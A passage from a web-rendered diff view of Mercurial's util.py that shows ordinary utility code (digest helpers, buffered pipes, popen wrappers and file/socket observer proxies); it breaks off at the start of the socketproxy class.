##// END OF EJS Templates
util: use error.Abort instead of local alias
Yuya Nishihara -
r37114:895f209b default
parent child Browse files
Show More
@@ -1,4093 +1,4094
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
def isatty(fp):
    """Return True if the file-like object *fp* is attached to a terminal.

    Objects without an isatty() method are treated as non-interactive.
    """
    try:
        interactive = fp.isatty()
    except AttributeError:
        return False
    return interactive
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
112 explainexit = platform.explainexit
113 findexe = platform.findexe
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
117 getuser = platform.getuser
118 getpid = os.getpid
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
122 isexec = platform.isexec
123 isowner = platform.isowner
123 isowner = platform.isowner
124 listdir = osutil.listdir
124 listdir = osutil.listdir
125 localpath = platform.localpath
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
127 makedir = platform.makedir
128 nlinks = platform.nlinks
128 nlinks = platform.nlinks
129 normpath = platform.normpath
129 normpath = platform.normpath
130 normcase = platform.normcase
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
136 pconvert = platform.pconvert
137 poll = platform.poll
137 poll = platform.poll
138 popen = platform.popen
138 popen = platform.popen
139 posixfile = platform.posixfile
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
141 readpipe = platform.readpipe
142 rename = platform.rename
142 rename = platform.rename
143 removedirs = platform.removedirs
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
144 samedevice = platform.samedevice
145 samefile = platform.samefile
145 samefile = platform.samefile
146 samestat = platform.samestat
146 samestat = platform.samestat
147 setbinary = platform.setbinary
147 setbinary = platform.setbinary
148 setflags = platform.setflags
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
153 split = platform.split
153 split = platform.split
154 sshargs = platform.sshargs
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
156 statisexec = platform.statisexec
157 statislink = platform.statislink
157 statislink = platform.statislink
158 testpid = platform.testpid
158 testpid = platform.testpid
159 umask = platform.umask
159 umask = platform.umask
160 unlink = platform.unlink
160 unlink = platform.unlink
161 username = platform.username
161 username = platform.username
162
162
163 try:
163 try:
164 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
165 except AttributeError:
165 except AttributeError:
166 pass
166 pass
167 try:
167 try:
168 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
169 except AttributeError:
169 except AttributeError:
170 pass
170 pass
171 try:
171 try:
172 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
173 except AttributeError:
174 pass
174 pass
175
175
# Python compatibility

# private sentinel distinguishing "attribute absent" from any real value
_notset = object()

def safehasattr(thing, attr):
    """Report whether *thing* has attribute *attr*.

    Implemented via getattr() with a sentinel default rather than hasattr().
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
182
182
183 def _rapply(f, xs):
183 def _rapply(f, xs):
184 if xs is None:
184 if xs is None:
185 # assume None means non-value of optional data
185 # assume None means non-value of optional data
186 return xs
186 return xs
187 if isinstance(xs, (list, set, tuple)):
187 if isinstance(xs, (list, set, tuple)):
188 return type(xs)(_rapply(f, x) for x in xs)
188 return type(xs)(_rapply(f, x) for x in xs)
189 if isinstance(xs, dict):
189 if isinstance(xs, dict):
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return f(xs)
191 return f(xs)
192
192
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
    """
    if f is pycompat.identity:
        # identity transform: nothing would change, so skip the rebuild
        # entirely (fast path, mainly useful on Python 2)
        return xs
    return _rapply(f, xs)
215
215
def bitsfrom(container):
    """Return the bitwise OR of all integers in *container*.

    An empty container yields 0.
    """
    mask = 0
    for flag in container:
        mask = mask | flag
    return mask
221
221
222 # python 2.6 still have deprecation warning enabled by default. We do not want
222 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # to display anything to standard user so detect if we are running test and
223 # to display anything to standard user so detect if we are running test and
224 # only use python deprecation warning in this case.
224 # only use python deprecation warning in this case.
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 if _dowarn:
226 if _dowarn:
227 # explicitly unfilter our warning for python 2.7
227 # explicitly unfilter our warning for python 2.7
228 #
228 #
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 if _dowarn and pycompat.ispy3:
236 if _dowarn and pycompat.ispy3:
237 # silence warning emitted by passing user string to re.sub()
237 # silence warning emitted by passing user string to re.sub()
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 r'mercurial')
239 r'mercurial')
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 DeprecationWarning, r'mercurial')
241 DeprecationWarning, r'mercurial')
242
242
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a native Python DeprecationWarning.

    This is a noop outside of tests (i.e. unless _dowarn was enabled via
    HGEMITWARNINGS); use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    suffix = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    # bump stacklevel so the warning points at our caller, not at us
    warnings.warn(pycompat.sysstr(msg + suffix), DeprecationWarning,
                  stacklevel + 1)
252
252
253 DIGESTS = {
253 DIGESTS = {
254 'md5': hashlib.md5,
254 'md5': hashlib.md5,
255 'sha1': hashlib.sha1,
255 'sha1': hashlib.sha1,
256 'sha512': hashlib.sha512,
256 'sha512': hashlib.sha512,
257 }
257 }
258 # List of digest types from strongest to weakest
258 # List of digest types from strongest to weakest
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260
260
261 for k in DIGESTS_BY_STRENGTH:
261 for k in DIGESTS_BY_STRENGTH:
262 assert k in DIGESTS
262 assert k in DIGESTS
263
263
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create hash objects for each name in *digests*; optionally feed
        initial data *s*. Raises error.Abort on an unknown digest name."""
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed *data* to every underlying hash object."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for *key*."""
        # Check against the digests actually requested in __init__, not the
        # global DIGESTS table: a known-but-unrequested name would otherwise
        # escape as a raw KeyError from self._hashes below.
        if key not in self._hashes:
            # BUG FIX: the message previously interpolated 'k', a leftover
            # module-level loop variable, so it always reported the wrong
            # digest name; report the key that was actually looked up.
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
310
310
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0                       # bytes read so far
        self._digests = dict(digests)       # name -> expected hex digest
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the digester as we go."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Abort unless the observed size and every digest match."""
        if self._got != self._size:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (name, expected, actual))
342
342
try:
    buffer = buffer
except NameError:
    # Python 3 dropped the buffer builtin; emulate it with zero-copy
    # memoryview slices.
    def buffer(sliceable, offset=0, length=None):
        if length is None:
            return memoryview(sliceable)[offset:]
        return memoryview(sliceable)[offset:offset + length]
350
350
351 closefds = pycompat.isposix
351 closefds = pycompat.isposix
352
352
353 _chunksize = 4096
353 _chunksize = 4096
354
354
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # A fileobjectproxy-wrapped handle gets the observing variant so
        # reads made through this buffer are still reported to observers.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe
        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []    # pending chunks, oldest first
        self._eof = False
        self._lenbuf = 0     # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep pulling chunks until we have enough bytes or hit EOF
        while not self._eof and self._lenbuf < size:
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # read and readline both end with a _frombuffer call that
            # collapses the buffer, so this should not happen; collapse
            # defensively anyway.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        # only the most recently appended chunk can contain a new newline
        while not self._eof and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0:
            # no newline found before EOF: hand back everything buffered
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # lfi is relative to the last chunk; account for earlier ones
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        if len(self._buffer) == 1:
            buf = self._buffer[0]
        else:
            buf = ''.join(self._buffer)

        data = buf[:size]
        rest = buf[len(data):]
        if rest:
            self._buffer = [rest]
            self._lenbuf = len(rest)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if data:
            self._lenbuf += len(data)
            self._buffer.append(data)
        else:
            self._eof = True

        return data
457
457
def mmapread(fp):
    """Map the whole of *fp* into memory read-only and return the mmap.

    *fp* may be a file object or a raw file descriptor. mmap refuses
    zero-length maps, so an empty file yields an empty buffer instead.
    """
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
468
468
def popen2(cmd, env=None, newlines=False):
    """Run *cmd* through the shell; return its (stdin, stdout) pipes.

    bufsize=-1 lets the system pick the buffer size; the subprocess default
    of 0 (unbuffered) performs poorly on Mac OS X:
    http://bugs.python.org/issue4194
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
479
479
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but return only the three standard pipes."""
    stdin, stdout, stderr, _proc = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
483
483
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run *cmd* through the shell.

    Returns the child's (stdin, stdout, stderr) pipes plus the Popen object
    itself so callers can wait on or poll the process.
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
492
492
493 class fileobjectproxy(object):
493 class fileobjectproxy(object):
494 """A proxy around file objects that tells a watcher when events occur.
494 """A proxy around file objects that tells a watcher when events occur.
495
495
496 This type is intended to only be used for testing purposes. Think hard
496 This type is intended to only be used for testing purposes. Think hard
497 before using it in important code.
497 before using it in important code.
498 """
498 """
499 __slots__ = (
499 __slots__ = (
500 r'_orig',
500 r'_orig',
501 r'_observer',
501 r'_observer',
502 )
502 )
503
503
504 def __init__(self, fh, observer):
504 def __init__(self, fh, observer):
505 object.__setattr__(self, r'_orig', fh)
505 object.__setattr__(self, r'_orig', fh)
506 object.__setattr__(self, r'_observer', observer)
506 object.__setattr__(self, r'_observer', observer)
507
507
508 def __getattribute__(self, name):
508 def __getattribute__(self, name):
509 ours = {
509 ours = {
510 r'_observer',
510 r'_observer',
511
511
512 # IOBase
512 # IOBase
513 r'close',
513 r'close',
514 # closed if a property
514 # closed if a property
515 r'fileno',
515 r'fileno',
516 r'flush',
516 r'flush',
517 r'isatty',
517 r'isatty',
518 r'readable',
518 r'readable',
519 r'readline',
519 r'readline',
520 r'readlines',
520 r'readlines',
521 r'seek',
521 r'seek',
522 r'seekable',
522 r'seekable',
523 r'tell',
523 r'tell',
524 r'truncate',
524 r'truncate',
525 r'writable',
525 r'writable',
526 r'writelines',
526 r'writelines',
527 # RawIOBase
527 # RawIOBase
528 r'read',
528 r'read',
529 r'readall',
529 r'readall',
530 r'readinto',
530 r'readinto',
531 r'write',
531 r'write',
532 # BufferedIOBase
532 # BufferedIOBase
533 # raw is a property
533 # raw is a property
534 r'detach',
534 r'detach',
535 # read defined above
535 # read defined above
536 r'read1',
536 r'read1',
537 # readinto defined above
537 # readinto defined above
538 # write defined above
538 # write defined above
539 }
539 }
540
540
541 # We only observe some methods.
541 # We only observe some methods.
542 if name in ours:
542 if name in ours:
543 return object.__getattribute__(self, name)
543 return object.__getattribute__(self, name)
544
544
545 return getattr(object.__getattribute__(self, r'_orig'), name)
545 return getattr(object.__getattribute__(self, r'_orig'), name)
546
546
547 def __nonzero__(self):
547 def __nonzero__(self):
548 return bool(object.__getattribute__(self, r'_orig'))
548 return bool(object.__getattribute__(self, r'_orig'))
549
549
550 __bool__ = __nonzero__
550 __bool__ = __nonzero__
551
551
552 def __delattr__(self, name):
552 def __delattr__(self, name):
553 return delattr(object.__getattribute__(self, r'_orig'), name)
553 return delattr(object.__getattribute__(self, r'_orig'), name)
554
554
555 def __setattr__(self, name, value):
555 def __setattr__(self, name, value):
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
557
557
558 def __iter__(self):
558 def __iter__(self):
559 return object.__getattribute__(self, r'_orig').__iter__()
559 return object.__getattribute__(self, r'_orig').__iter__()
560
560
561 def _observedcall(self, name, *args, **kwargs):
561 def _observedcall(self, name, *args, **kwargs):
562 # Call the original object.
562 # Call the original object.
563 orig = object.__getattribute__(self, r'_orig')
563 orig = object.__getattribute__(self, r'_orig')
564 res = getattr(orig, name)(*args, **kwargs)
564 res = getattr(orig, name)(*args, **kwargs)
565
565
566 # Call a method on the observer of the same name with arguments
566 # Call a method on the observer of the same name with arguments
567 # so it can react, log, etc.
567 # so it can react, log, etc.
568 observer = object.__getattribute__(self, r'_observer')
568 observer = object.__getattribute__(self, r'_observer')
569 fn = getattr(observer, name, None)
569 fn = getattr(observer, name, None)
570 if fn:
570 if fn:
571 fn(res, *args, **kwargs)
571 fn(res, *args, **kwargs)
572
572
573 return res
573 return res
574
574
575 def close(self, *args, **kwargs):
575 def close(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
577 r'close', *args, **kwargs)
577 r'close', *args, **kwargs)
578
578
579 def fileno(self, *args, **kwargs):
579 def fileno(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
581 r'fileno', *args, **kwargs)
581 r'fileno', *args, **kwargs)
582
582
583 def flush(self, *args, **kwargs):
583 def flush(self, *args, **kwargs):
584 return object.__getattribute__(self, r'_observedcall')(
584 return object.__getattribute__(self, r'_observedcall')(
585 r'flush', *args, **kwargs)
585 r'flush', *args, **kwargs)
586
586
587 def isatty(self, *args, **kwargs):
587 def isatty(self, *args, **kwargs):
588 return object.__getattribute__(self, r'_observedcall')(
588 return object.__getattribute__(self, r'_observedcall')(
589 r'isatty', *args, **kwargs)
589 r'isatty', *args, **kwargs)
590
590
591 def readable(self, *args, **kwargs):
591 def readable(self, *args, **kwargs):
592 return object.__getattribute__(self, r'_observedcall')(
592 return object.__getattribute__(self, r'_observedcall')(
593 r'readable', *args, **kwargs)
593 r'readable', *args, **kwargs)
594
594
595 def readline(self, *args, **kwargs):
595 def readline(self, *args, **kwargs):
596 return object.__getattribute__(self, r'_observedcall')(
596 return object.__getattribute__(self, r'_observedcall')(
597 r'readline', *args, **kwargs)
597 r'readline', *args, **kwargs)
598
598
599 def readlines(self, *args, **kwargs):
599 def readlines(self, *args, **kwargs):
600 return object.__getattribute__(self, r'_observedcall')(
600 return object.__getattribute__(self, r'_observedcall')(
601 r'readlines', *args, **kwargs)
601 r'readlines', *args, **kwargs)
602
602
603 def seek(self, *args, **kwargs):
603 def seek(self, *args, **kwargs):
604 return object.__getattribute__(self, r'_observedcall')(
604 return object.__getattribute__(self, r'_observedcall')(
605 r'seek', *args, **kwargs)
605 r'seek', *args, **kwargs)
606
606
607 def seekable(self, *args, **kwargs):
607 def seekable(self, *args, **kwargs):
608 return object.__getattribute__(self, r'_observedcall')(
608 return object.__getattribute__(self, r'_observedcall')(
609 r'seekable', *args, **kwargs)
609 r'seekable', *args, **kwargs)
610
610
611 def tell(self, *args, **kwargs):
611 def tell(self, *args, **kwargs):
612 return object.__getattribute__(self, r'_observedcall')(
612 return object.__getattribute__(self, r'_observedcall')(
613 r'tell', *args, **kwargs)
613 r'tell', *args, **kwargs)
614
614
615 def truncate(self, *args, **kwargs):
615 def truncate(self, *args, **kwargs):
616 return object.__getattribute__(self, r'_observedcall')(
616 return object.__getattribute__(self, r'_observedcall')(
617 r'truncate', *args, **kwargs)
617 r'truncate', *args, **kwargs)
618
618
619 def writable(self, *args, **kwargs):
619 def writable(self, *args, **kwargs):
620 return object.__getattribute__(self, r'_observedcall')(
620 return object.__getattribute__(self, r'_observedcall')(
621 r'writable', *args, **kwargs)
621 r'writable', *args, **kwargs)
622
622
623 def writelines(self, *args, **kwargs):
623 def writelines(self, *args, **kwargs):
624 return object.__getattribute__(self, r'_observedcall')(
624 return object.__getattribute__(self, r'_observedcall')(
625 r'writelines', *args, **kwargs)
625 r'writelines', *args, **kwargs)
626
626
627 def read(self, *args, **kwargs):
627 def read(self, *args, **kwargs):
628 return object.__getattribute__(self, r'_observedcall')(
628 return object.__getattribute__(self, r'_observedcall')(
629 r'read', *args, **kwargs)
629 r'read', *args, **kwargs)
630
630
631 def readall(self, *args, **kwargs):
631 def readall(self, *args, **kwargs):
632 return object.__getattribute__(self, r'_observedcall')(
632 return object.__getattribute__(self, r'_observedcall')(
633 r'readall', *args, **kwargs)
633 r'readall', *args, **kwargs)
634
634
635 def readinto(self, *args, **kwargs):
635 def readinto(self, *args, **kwargs):
636 return object.__getattribute__(self, r'_observedcall')(
636 return object.__getattribute__(self, r'_observedcall')(
637 r'readinto', *args, **kwargs)
637 r'readinto', *args, **kwargs)
638
638
639 def write(self, *args, **kwargs):
639 def write(self, *args, **kwargs):
640 return object.__getattribute__(self, r'_observedcall')(
640 return object.__getattribute__(self, r'_observedcall')(
641 r'write', *args, **kwargs)
641 r'write', *args, **kwargs)
642
642
643 def detach(self, *args, **kwargs):
643 def detach(self, *args, **kwargs):
644 return object.__getattribute__(self, r'_observedcall')(
644 return object.__getattribute__(self, r'_observedcall')(
645 r'detach', *args, **kwargs)
645 r'detach', *args, **kwargs)
646
646
647 def read1(self, *args, **kwargs):
647 def read1(self, *args, **kwargs):
648 return object.__getattribute__(self, r'_observedcall')(
648 return object.__getattribute__(self, r'_observedcall')(
649 r'read1', *args, **kwargs)
649 r'read1', *args, **kwargs)
650
650
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        # Surface the underlying os.read() to the observer, if it cares.
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        hook = getattr(self._input._observer, r'osread', None)
        if hook:
            hook(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        hook = getattr(self._input._observer, r'bufferedread', None)
        if hook:
            hook(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        hook = getattr(self._input._observer, r'bufferedreadline', None)
        if hook:
            hook(res)

        return res
690
690
# Socket methods intercepted by socketproxy; everything else passes
# straight through to the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

